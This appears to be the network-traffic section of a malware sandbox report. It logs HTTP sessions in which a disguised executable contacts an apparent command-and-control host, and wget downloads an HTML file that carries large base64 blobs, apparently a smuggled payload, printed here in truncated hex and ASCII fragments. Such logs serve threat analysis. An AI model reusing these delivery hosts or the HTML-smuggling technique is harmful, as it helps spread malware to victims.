                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:24 UTC5012OUTGET /3oDy7mm HTTP/1.1
                                                                  Host: bit.ly
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2023-04-26 07:00:24 UTC5012INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Wed, 26 Apr 2023 07:00:24 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 162
                                                                  Cache-Control: private, max-age=90
                                                                  Content-Security-Policy: referrer always;
                                                                  Location: https://i1.wp.com/flevix.com/wp-content/uploads/2019/07/Focus-Loading-1.gif
                                                                  Referrer-Policy: unsafe-url
                                                                  Set-Cookie: _bit=n3q70o-1ed50f6264594c9e13-00v; Domain=bit.ly; Expires=Mon, 23 Oct 2023 07:00:24 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2023-04-26 07:00:24 UTC5013INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 31 2e 77 70 2e 63 6f 6d 2f 66 6c 65 76 69 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 39 2f 30 37 2f 46 6f 63 75 73 2d 4c 6f 61 64 69 6e 67 2d 31 2e 67 69 66 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://i1.wp.com/flevix.com/wp-content/uploads/2019/07/Focus-Loading-1.gif">moved here</a></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  13192.168.2.3497175.181.156.27443C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:01:37 UTC5013OUTGET /Alienware/index.php HTTP/1.1
                                                                  User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
                                                                  Host: mondialarqcondicetchat.com
                                                                  Connection: Keep-Alive
                                                                  2023-04-26 07:01:37 UTC5013INHTTP/1.1 302 Found
                                                                  Date: Wed, 26 Apr 2023 07:01:37 GMT
                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                  Location: https://amxx1515cabreun23.asxo/
                                                                  Content-Length: 92
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  2023-04-26 07:01:37 UTC5013INData Raw: 3c 73 74 72 6f 6e 67 3e 42 72 6f 77 73 65 72 3a 20 3c 2f 73 74 72 6f 6e 67 3e 43 68 72 6f 6d 65 3c 62 72 20 2f 3e 3c 73 74 72 6f 6e 67 3e 4f 70 65 72 61 74 69 6e 67 20 53 79 73 74 65 6d 3a 20 3c 2f 73 74 72 6f 6e 67 3e 55 6e 6b 6e 6f 77 6e 20 4f 53 20 50 6c 61 74 66 6f 72 6d
                                                                  Data Ascii: <strong>Browser: </strong>Chrome<br /><strong>Operating System: </strong>Unknown OS Platform


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.349698185.143.234.120443C:\Windows\SysWOW64\wget.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2023-04-26 07:00:12 UTC3OUTGET /empresa01.html HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir
                                                                  Connection: Keep-Alive
                                                                  2023-04-26 07:00:13 UTC3INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:00:13 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 4910763
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  last-modified: Wed, 26 Apr 2023 00:24:14 GMT
                                                                  x-rgw-object-type: Normal
                                                                  etag: "129fd6c355b98367b94aef462eec588d-1"
                                                                  x-amz-request-id: tx0000046d62ead13cd5443-006448cbfd-34c327-ir-tbz-sh1
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Server: ArvanCloud
                                                                  X-SID: 4102
                                                                  Server-Timing: total;dur=452
                                                                  X-Cache: BYPASS
                                                                  X-Request-ID: b2f4d920e9ebc52a3aaa5d3753bb05c6
                                                                  Accept-Ranges: bytes
                                                                  2023-04-26 07:00:13 UTC3INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 36 2e 30 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 7a 69 70 2f 33 2e 36 2e 30 2f 6a 73 7a 69 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 7a 69 70 2d 75
                                                                  Data Ascii: <html><head><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.6.0/jszip.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/jszip-u
                                                                  2023-04-26 07:00:13 UTC19INData Raw: 46 51 41 41 59 68 55 41 41 47 4d 56 41 41 42 6b 46 51 41 41 5a 52 55 41 41 47 59 56 41 41 42 6e 46 51 41 41 61 42 55 41 41 47 6b 56 20 41 41 42 71 46 51 41 41 61 78 55 41 41 47 77 56 41 41 42 74 46 51 41 41 62 68 55 41 41 47 38 56 41 41 42 77 46 51 41 41 63 52 55 41 41 48 49 56 41 41 42 7a 46 51 41 41 64 42 55 41 41 48 55 56 41 41 42 32 46 51 41 41 64 78 55 41 20 41 48 67 56 41 41 42 35 46 51 41 41 65 68 55 41 41 48 73 56 41 41 42 38 46 51 41 41 66 52 55 41 41 48 34 56 41 41 42 2f 46 51 41 41 67 42 55 41 41 49 45 56 41 41 43 43 46 51 41 41 67 78
                                                                  Data Ascii: FQAAYhUAAGMVAABkFQAAZRUAAGYVAABnFQAAaBUAAGkV AABqFQAAaxUAAGwVAABtFQAAbhUAAG8VAABwFQAAcRUAAHIVAABzFQAAdBUAAHUVAAB2FQAAdxUA AHgVAAB5FQAAehUAAHsVAAB8FQAAfRUAAH4VAAB/FQAAgBUAAIEVAACCFQAAgx
                                                                  2023-04-26 07:00:13 UTC19INData Raw: 55 41 41 49 51 56 41 41 43 46 46 51 41 41 20 68 68 55 41 41 49 63 56 41 41 43 49 46 51 41 41 69 52 55 41 41 49 6f 56 41 41 43 4c 46 51 41 41 6a 42 55 41 41 49 30 56 41 41 43 4f 46 51 41 41 6a 78 55 41 41 4a 41 56 41 41 43 52 46 51 41 41 6b 68 55 41 41 4a 4d 56 41 41 43 55 20 46 51 41 41 6c 52 55 41 41 4a 59 56 41 41 43 58 46 51 41 41 6d 42 55 41 41 4a 6b 56 41 41 43 61 46 51 41 41 6d 78 55 41 41 4a 77 56 41 41 43 64 46 51 41 41 6e 68 55 41 41 4a 38 56 41 41 43 67 46 51 41 41 6f 52 55 41 41 4b 49 56 20 41 41 43 6a 46 51 41 41 70 42 55 41 41 4b 55 56 41 41 43 6d 46 51 41 41 70 78 55 41 41 4b 67 56 41 41 43 70 46 51 41 41 71 68 55 41 41 4b 73 56 41 41 43 73 46 51 41 41 72 52 55 41 41 4b 34 56 41 41 43 76 46 51 41 41 73 42 55 41 20 41 4c 45 56 41 41 43 79 46
                                                                  Data Ascii: UAAIQVAACFFQAA hhUAAIcVAACIFQAAiRUAAIoVAACLFQAAjBUAAI0VAACOFQAAjxUAAJAVAACRFQAAkhUAAJMVAACU FQAAlRUAAJYVAACXFQAAmBUAAJkVAACaFQAAmxUAAJwVAACdFQAAnhUAAJ8VAACgFQAAoRUAAKIV AACjFQAApBUAAKUVAACmFQAApxUAAKgVAACpFQAAqhUAAKsVAACsFQAArRUAAK4VAACvFQAAsBUA ALEVAACyF
                                                                  2023-04-26 07:00:13 UTC34INData Raw: 41 41 41 41 2f 50 2f 2f 66 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 38 2f 2f 39 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 51 41 41 67 41 41 41 41 49 41 41 41 41 41 41 41 51 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 41 41 67 41 41 41
                                                                  Data Ascii: AAAA/P//fwAAAAAAAAAAAAAAAAEAAIAAAAAAAAAAAAAAAAD8//9/AAAAAAAAAAAAAAAA AQAAgAAAAIAAAAAAAQAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAA AACAAAAAAAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAA AAAAAACAAAAAAAAAAAAAAACAAAAAgAAA
                                                                  2023-04-26 07:00:13 UTC50INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 37 67 57 6f 42 4f 38 46 79 41 54 78 42 66 49 46 6e 41 53 7a 42 4c 55 45 38 77 58 31 42 66 59 46 79 77 54 34 42 66 6b 46 20 2b 67 57 4d 42 47 6f 45 34 77 54 37 42 59 51 46 51 41 51 66 42 58 6f 46 47 77 56 47 42 50 34 46 6b 41 55 42 42 67 4d 47 42 41 61 43 42 41 6b 41 43 67 41 4f 41 41 38 41 45 41 41 33 41 6a 30 43 51 67 49 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 36 49 4d 67 67 38 69 5a 33 49 56 34 68 59 53 44 50 49 2b 67 6a 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4a 41 41 6f 41 4e 77 4b 6b 41 71 55 43 70 67 4b 6e 41 71 67 43 20 71 51 4b 71 41 71 73 43 41 41 41 41 41 41 41 41 41 41 41 41 41 47 30 42 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7gWoBO8FyATxBfIFnASzBLUE8wX1BfYFywT4BfkF +gWMBGoE4wT7BYQFQAQfBXoFGwVGBP4FkAUBBgMGBAaCBAkACgAOAA8AEAA3Aj0CQgIAAAAAAAAA AAAAAAAAAAAA6IMgg8iZ3IV4hYSDPI+gjwAAAAAAAAAAAAAAAAAAAAAJAAoANwKkAqUCpgKnAqgC qQKqAqsCAAAAAAAAAAAAAG0BAAAA
                                                                  2023-04-26 07:00:13 UTC66INData Raw: 32 79 44 6d 4e 34 69 31 39 59 76 6e 72 37 78 75 53 6b 53 57 57 35 61 4f 53 73 71 77 30 69 6f 4d 6c 42 30 57 47 5a 47 5a 7a 31 69 31 4a 53 63 51 71 35 68 7a 35 69 4e 54 31 61 32 37 68 31 32 6e 71 58 30 35 35 43 32 51 79 55 61 67 20 6f 35 67 4e 51 48 51 50 42 4e 64 73 56 34 5a 72 57 31 31 4e 79 30 6b 70 2b 31 43 68 35 50 4d 44 73 43 75 6e 46 49 4e 47 53 4d 36 6d 48 34 48 6d 4e 68 46 6c 4a 45 32 6e 42 4a 77 48 2f 41 38 78 46 74 4f 37 4b 64 2f 4d 5a 34 2b 7a 20 4d 4d 50 2b 59 32 4c 55 38 46 4b 6d 51 4c 35 7a 4f 54 71 55 63 57 66 55 42 6e 32 32 52 79 73 55 51 49 68 6a 33 6b 36 65 64 6a 30 6e 61 6b 6c 4a 45 63 62 4e 31 43 30 61 65 57 6d 55 48 7a 55 38 59 2f 6c 33 32 69 54 79 55 49 7a 38 20 36 54 78 6a 37 4e 56 71 75 6b 6f 64 47 4b 71 6d 6a 6b 71 6c 2b 4d 30 48
                                                                  Data Ascii: 2yDmN4i19Yvnr7xuSkSWW5aOSsqw0ioMlB0WGZGZz1i1JScQq5hz5iNT1a27h12nqX055C2QyUag o5gNQHQPBNdsV4ZrW11Ny0kp+1Ch5PMDsCunFINGSM6mH4HmNhFlJE2nBJwH/A8xFtO7Kd/MZ4+z MMP+Y2LU8FKmQL5zOTqUcWfUBn22RysUQIhj3k6edj0naklJEcbN1C0aeWmUHzU8Y/l32iTyUIz8 6Txj7NVqukodGKqmjkql+M0H
                                                                  2023-04-26 07:00:13 UTC82INData Raw: 44 4a 51 20 41 4e 54 6a 2f 77 43 78 78 2f 38 41 6a 71 76 2f 41 47 75 50 2f 77 42 49 63 2f 38 41 4a 56 66 2f 41 41 42 56 2f 77 41 41 53 64 77 41 41 44 32 35 41 41 41 78 6c 67 41 41 4a 58 4d 41 41 42 6c 51 41 4e 54 55 2f 77 43 78 73 66 38 41 20 6a 6f 37 2f 41 47 74 72 2f 77 42 49 53 50 38 41 4a 53 58 2f 41 41 41 41 2f 67 41 41 41 4e 77 41 41 41 43 35 41 41 41 41 6c 67 41 41 41 48 4d 41 41 41 42 51 41 4f 50 55 2f 77 44 48 73 66 38 41 71 34 37 2f 41 49 39 72 2f 77 42 7a 20 53 50 38 41 56 79 58 2f 41 46 55 41 2f 77 42 4a 41 4e 77 41 50 51 43 35 41 44 45 41 6c 67 41 6c 41 48 4d 41 47 51 42 51 41 50 44 55 2f 77 44 69 73 66 38 41 31 49 37 2f 41 4d 5a 72 2f 77 43 34 53 50 38 41 71 69 58 2f 41 4b 6f 41 20 2f 77 43 53 41 4e 77 41 65 67 43 35 41 47 49 41 6c 67 42 4b
                                                                  Data Ascii: DJQ ANTj/wCxx/8Ajqv/AGuP/wBIc/8AJVf/AABV/wAASdwAAD25AAAxlgAAJXMAABlQANTU/wCxsf8A jo7/AGtr/wBISP8AJSX/AAAA/gAAANwAAAC5AAAAlgAAAHMAAABQAOPU/wDHsf8Aq47/AI9r/wBz SP8AVyX/AFUA/wBJANwAPQC5ADEAlgAlAHMAGQBQAPDU/wDisf8A1I7/AMZr/wC4SP8AqiX/AKoA /wCSANwAegC5AGIAlgBK
                                                                  2023-04-26 07:00:13 UTC98INData Raw: 44 41 43 41 41 41 78 20 41 67 41 41 4d 67 49 41 41 44 4d 43 41 41 41 30 41 67 41 41 4e 51 49 41 41 44 59 43 41 41 41 33 41 67 41 41 4f 41 49 41 41 44 6b 43 41 41 41 36 41 67 41 41 4f 77 49 41 41 44 77 43 41 41 41 39 41 67 41 41 50 67 49 41 41 44 38 43 20 41 41 42 41 41 67 41 41 51 51 49 41 41 45 49 43 41 41 42 44 41 67 41 41 52 41 49 41 41 45 55 43 41 41 42 47 41 67 41 41 52 77 49 41 41 45 67 43 41 41 42 4a 41 67 41 41 53 67 49 41 41 45 73 43 41 41 42 4d 41 67 41 41 54 51 49 41 20 41 45 34 43 41 41 42 50 41 67 41 41 55 41 49 41 41 46 45 43 41 41 42 53 41 67 41 41 55 77 49 41 41 46 51 43 41 41 42 56 41 67 41 41 56 67 49 41 41 46 63 43 41 41 42 59 41 67 41 41 57 51 49 41 41 46 6f 43 41 41 42 62 41 67 41 41 20 58 41 49 41 41 46 30 43 41 41 42 65 41 67 41 41
                                                                  Data Ascii: DACAAAx AgAAMgIAADMCAAA0AgAANQIAADYCAAA3AgAAOAIAADkCAAA6AgAAOwIAADwCAAA9AgAAPgIAAD8C AABAAgAAQQIAAEICAABDAgAARAIAAEUCAABGAgAARwIAAEgCAABJAgAASgIAAEsCAABMAgAATQIA AE4CAABPAgAAUAIAAFECAABSAgAAUwIAAFQCAABVAgAAVgIAAFcCAABYAgAAWQIAAFoCAABbAgAA XAIAAF0CAABeAgAA
                                                                  2023-04-26 07:00:13 UTC114INData Raw: 32 51 76 49 55 65 67 4a 48 67 49 41 67 38 51 49 69 51 62 48 52 66 7a 2f 20 2f 2f 2f 2f 36 78 43 34 4f 54 59 41 45 4d 50 48 52 66 7a 2f 2f 2f 2f 2f 69 33 58 73 67 7a 34 41 44 35 58 41 69 30 33 30 5a 49 6b 4e 41 41 41 41 41 46 6c 66 58 6c 75 4c 35 56 33 43 42 41 44 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 20 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 56 59 76 73 61 76 39 6f 4d 48 4d 44 45 47 53 68 41 41 41 41 41 46 42 57 6f 53 53 51 42 52 41 7a 78 56 43 4e 52 66 52 6b 6f 77 41 41 41 41 43 4c 38 63 63 47 47 47 6f 45 45 49 74 47 42 49 58 41 20 64 41 35 51 2f 78 58 73 30 41 4d 51 78 30 59 45 41 41 41 41 41 50 5a 46 43 41 46 30 42 31 62 2f 46 55 54 53 41 78 43 4c 78 6f 74 4e 39 47 53 4a 44 51 41 41 41 41 42 5a 58 6f 76 6c 58 63 49 45 41 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d
                                                                  Data Ascii: 2QvIUegJHgIAg8QIiQbHRfz/ ////6xC4OTYAEMPHRfz/////i3Xsgz4AD5XAi030ZIkNAAAAAFlfXluL5V3CBADMzMzMzMzMzMzM zMzMzMzMzMzMVYvsav9oMHMDEGShAAAAAFBWoSSQBRAzxVCNRfRkowAAAACL8ccGGGoEEItGBIXA dA5Q/xXs0AMQx0YEAAAAAPZFCAF0B1b/FUTSAxCLxotN9GSJDQAAAABZXovlXcIEAMzMzMzMzMzM
                                                                  2023-04-26 07:00:13 UTC129INData Raw: 66 77 34 6a 59 56 6f 2f 2f 2f 2f 55 50 2f 58 20 78 6b 58 38 4e 34 31 46 6d 46 44 2f 31 38 5a 46 2f 44 61 4e 52 59 68 51 2f 39 66 47 52 66 77 74 56 76 38 56 34 4e 49 44 45 4d 5a 46 2f 43 53 4c 52 65 53 46 77 48 51 47 69 77 68 51 2f 31 45 49 78 6b 58 38 48 49 74 46 34 49 58 41 20 64 41 61 4c 43 46 44 2f 55 51 6a 47 52 66 77 56 69 30 58 63 68 63 42 30 42 6f 73 49 55 50 39 52 43 4d 5a 46 2f 41 2b 4c 52 64 69 46 77 48 51 47 69 77 68 51 2f 31 45 49 78 6b 58 38 43 6f 74 46 31 49 58 41 64 41 61 4c 43 46 44 2f 20 55 51 6a 47 52 66 77 47 69 30 58 51 68 63 42 30 42 6f 73 49 55 50 39 52 43 4d 5a 46 2f 41 53 4c 52 63 79 46 77 48 51 47 69 77 68 51 2f 31 45 49 78 6b 58 38 41 6f 32 46 65 50 2f 2f 2f 31 44 2f 31 38 5a 46 2f 41 43 4c 52 63 69 46 20 77 48 51 47 69 77 68 51
                                                                  Data Ascii: fw4jYVo////UP/X xkX8N41FmFD/18ZF/DaNRYhQ/9fGRfwtVv8V4NIDEMZF/CSLReSFwHQGiwhQ/1EIxkX8HItF4IXA dAaLCFD/UQjGRfwVi0XchcB0BosIUP9RCMZF/A+LRdiFwHQGiwhQ/1EIxkX8CotF1IXAdAaLCFD/ UQjGRfwGi0XQhcB0BosIUP9RCMZF/ASLRcyFwHQGiwhQ/1EIxkX8Ao2FeP///1D/18ZF/ACLRciF wHQGiwhQ
                                                                  2023-04-26 07:00:13 UTC145INData Raw: 4d 64 46 37 41 63 41 41 41 42 6d 69 55 58 59 69 55 58 38 20 68 66 5a 30 47 59 74 46 44 44 76 47 63 6e 51 72 78 6f 50 34 2f 77 39 43 79 49 74 46 43 46 47 4e 42 48 42 51 36 77 62 2f 64 51 7a 2f 64 51 69 4e 54 64 6a 6f 71 4a 66 2f 2f 34 4e 39 36 41 42 30 4a 49 74 39 30 49 31 4e 32 46 47 4c 20 52 77 51 37 52 77 68 30 44 59 76 49 36 48 79 42 2f 2f 2b 44 52 77 51 59 36 77 68 51 69 38 2f 6f 62 71 58 2f 2f 38 64 46 2f 50 2f 2f 2f 2f 2b 4e 54 64 6a 6f 37 35 6a 2f 2f 34 74 4e 39 47 53 4a 44 51 41 41 41 41 42 5a 58 31 36 4c 20 54 66 41 7a 7a 65 6a 38 75 51 45 41 69 2b 56 64 77 2b 6a 50 41 67 41 41 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 56 59 76 73 61 76 39 6f 37 6f 55 44 45 47 53 68 41 41 41 41 41 46 43 44 37 41 68 57 6f 53 53 51 20 42 52 41 7a
                                                                  Data Ascii: MdF7AcAAABmiUXYiUX8 hfZ0GYtFDDvGcnQrxoP4/w9CyItFCFGNBHBQ6wb/dQz/dQiNTdjoqJf//4N96AB0JIt90I1N2FGL RwQ7Rwh0DYvI6HyB//+DRwQY6whQi8/obqX//8dF/P////+NTdjo75j//4tN9GSJDQAAAABZX16L TfAzzej8uQEAi+Vdw+jPAgAAzMzMzMzMzMzMzMzMzMzMVYvsav9o7oUDEGShAAAAAFCD7AhWoSSQ BRAz
                                                                  2023-04-26 07:00:13 UTC161INData Raw: 36 43 79 4e 2f 2f 2b 4c 79 49 58 4a 44 34 54 6e 41 67 41 41 69 77 47 4c 51 41 7a 2f 30 49 50 41 45 49 6c 46 20 75 4d 5a 46 2f 41 69 4e 54 62 68 71 41 47 69 77 61 51 51 51 36 43 4b 61 2f 2f 2b 4c 52 62 53 44 65 44 67 41 64 41 75 4e 54 62 78 52 69 38 6a 6f 2f 74 6a 2f 2f 38 5a 46 2f 41 57 4c 78 6f 74 56 75 49 50 43 38 50 41 50 77 55 49 4d 20 53 49 58 41 66 77 69 4c 43 6c 4b 4c 41 66 39 51 42 4d 5a 46 2f 41 43 4c 78 6f 74 56 76 49 50 43 38 50 41 50 77 55 49 4d 53 49 58 41 66 77 69 4c 43 6c 4b 4c 41 66 39 51 42 49 74 46 72 49 4e 34 46 41 41 50 68 43 6b 42 41 41 43 4c 20 7a 2b 67 75 43 41 41 41 68 4d 41 50 68 52 6f 42 41 41 44 6f 41 64 66 2f 2f 34 42 34 48 41 41 50 68 50 55 41 41 41 44 6f 38 74 62 2f 2f 34 6c 46 73 4f 68 36 6a 50 2f 2f 69 38 69 46 79 51 2b 45
                                                                  Data Ascii: 6CyN//+LyIXJD4TnAgAAiwGLQAz/0IPAEIlF uMZF/AiNTbhqAGiwaQQQ6CKa//+LRbSDeDgAdAuNTbxRi8jo/tj//8ZF/AWLxotVuIPC8PAPwUIM SIXAfwiLClKLAf9QBMZF/ACLxotVvIPC8PAPwUIMSIXAfwiLClKLAf9QBItFrIN4FAAPhCkBAACL z+guCAAAhMAPhRoBAADoAdf//4B4HAAPhPUAAADo8tb//4lFsOh6jP//i8iFyQ+E
                                                                  2023-04-26 07:00:13 UTC177INData Raw: 44 45 46 64 6f 6f 41 55 41 41 46 44 2f 30 32 70 61 2f 37 61 51 41 41 41 41 69 55 5a 73 2f 39 56 71 43 76 2b 32 6b 41 41 41 41 49 76 34 2f 39 56 58 61 4b 41 46 20 41 41 42 51 2f 39 4f 4c 50 53 6a 54 41 78 43 4c 79 49 74 47 5a 41 57 67 42 51 41 41 69 55 35 77 69 55 5a 55 69 30 5a 73 4c 61 41 46 41 41 43 4a 52 6c 79 4c 52 6d 67 46 4f 41 51 41 41 49 46 2b 48 41 45 42 42 41 43 4a 52 6c 69 4e 20 67 63 6a 37 2f 2f 2b 4a 52 43 51 51 69 55 5a 67 64 41 31 71 2f 32 6f 41 61 4c 45 41 41 41 44 2f 4e 76 2f 58 6a 55 5a 30 55 47 6f 41 61 44 51 45 41 41 44 2f 4e 76 2f 58 69 30 5a 30 4d 2b 32 37 41 51 41 41 41 44 74 47 65 41 2b 4e 20 6d 51 41 41 41 41 38 66 41 49 58 62 44 34 53 4f 41 41 41 41 44 37 64 47 49 45 55 37 36 48 78 4d 44 37 64 47 49 6a 76 6f 66 30 54 2f 74 70 41
                                                                  Data Ascii: DEFdooAUAAFD/02pa/7aQAAAAiUZs/9VqCv+2kAAAAIv4/9VXaKAF AABQ/9OLPSjTAxCLyItGZAWgBQAAiU5wiUZUi0ZsLaAFAACJRlyLRmgFOAQAAIF+HAEBBACJRliN gcj7//+JRCQQiUZgdA1q/2oAaLEAAAD/Nv/XjUZ0UGoAaDQEAAD/Nv/Xi0Z0M+27AQAAADtGeA+N mQAAAA8fAIXbD4SOAAAAD7dGIEU76HxMD7dGIjvof0T/tpA
                                                                  2023-04-26 07:00:13 UTC193INData Raw: 41 41 41 78 6b 58 38 41 6f 31 46 32 46 43 36 6c 4c 77 45 45 49 76 4f 36 42 6a 75 2f 2f 2b 44 20 78 41 53 45 77 41 2b 45 35 41 49 41 41 49 74 46 33 49 58 41 64 42 35 6d 67 7a 67 41 64 42 69 4e 54 64 69 4c 30 46 47 4c 7a 75 69 54 37 76 2f 2f 67 38 51 45 68 4d 41 50 68 4c 38 43 41 41 43 4c 64 64 79 34 53 4a 59 45 45 49 50 6f 20 41 6f 48 75 53 4a 59 45 45 41 38 66 67 41 41 41 41 41 41 50 74 30 77 47 41 6f 31 41 41 67 2b 33 45 47 59 37 79 6e 4a 51 64 30 64 6d 68 63 6c 30 42 57 61 46 30 6e 58 6b 4d 38 44 72 51 38 5a 46 2f 41 43 4c 52 65 79 4c 4e 55 54 53 20 41 78 43 46 77 48 51 44 55 50 2f 57 78 30 58 73 41 41 41 41 41 4d 64 46 36 41 41 41 41 41 44 48 52 66 7a 2f 2f 2f 2f 2f 68 66 38 50 68 4a 38 43 41 41 42 58 2f 39 62 70 6c 77 49 41 41 4c 67 42 41 41 41 41 36
                                                                  Data Ascii: AAAxkX8Ao1F2FC6lLwEEIvO6Bju//+D xASEwA+E5AIAAItF3IXAdB5mgzgAdBiNTdiL0FGLzuiT7v//g8QEhMAPhL8CAACLddy4SJYEEIPo AoHuSJYEEA8fgAAAAAAPt0wGAo1AAg+3EGY7ynJQd0dmhcl0BWaF0nXkM8DrQ8ZF/ACLReyLNUTS AxCFwHQDUP/Wx0XsAAAAAMdF6AAAAADHRfz/////hf8PhJ8CAABX/9bplwIAALgBAAAA6
                                                                  2023-04-26 07:00:13 UTC209INData Raw: 4c 72 59 73 67 51 51 69 38 76 6f 30 62 76 2f 2f 34 73 31 2f 4e 4d 44 45 49 31 46 38 49 50 45 42 4d 64 46 20 38 41 51 42 41 41 42 51 6a 59 56 59 42 41 41 41 55 47 69 59 77 41 51 51 55 2f 2f 57 68 63 41 50 68 57 51 42 41 41 43 4e 52 66 44 48 52 66 42 41 41 41 41 41 55 49 32 46 59 41 59 41 41 46 42 6f 78 4d 67 45 45 46 50 2f 31 6f 58 41 20 44 34 56 43 41 51 41 41 4d 38 6d 4e 68 56 67 45 41 41 42 6d 4f 59 31 59 42 41 41 41 64 41 30 50 48 77 43 4e 51 41 4a 42 5a 6f 4d 34 41 48 58 32 6a 59 56 59 42 41 41 41 75 74 7a 49 42 42 43 4e 42 45 69 35 4b 67 41 41 41 43 76 51 20 6b 47 61 4a 43 49 31 41 41 67 2b 33 44 41 4a 6d 68 63 6c 31 38 54 50 4a 61 46 41 43 41 41 42 6d 69 51 69 4e 52 51 42 52 55 4f 67 39 46 67 45 41 67 38 51 4d 6a 55 55 41 55 49 32 46 57 41 51 41 41
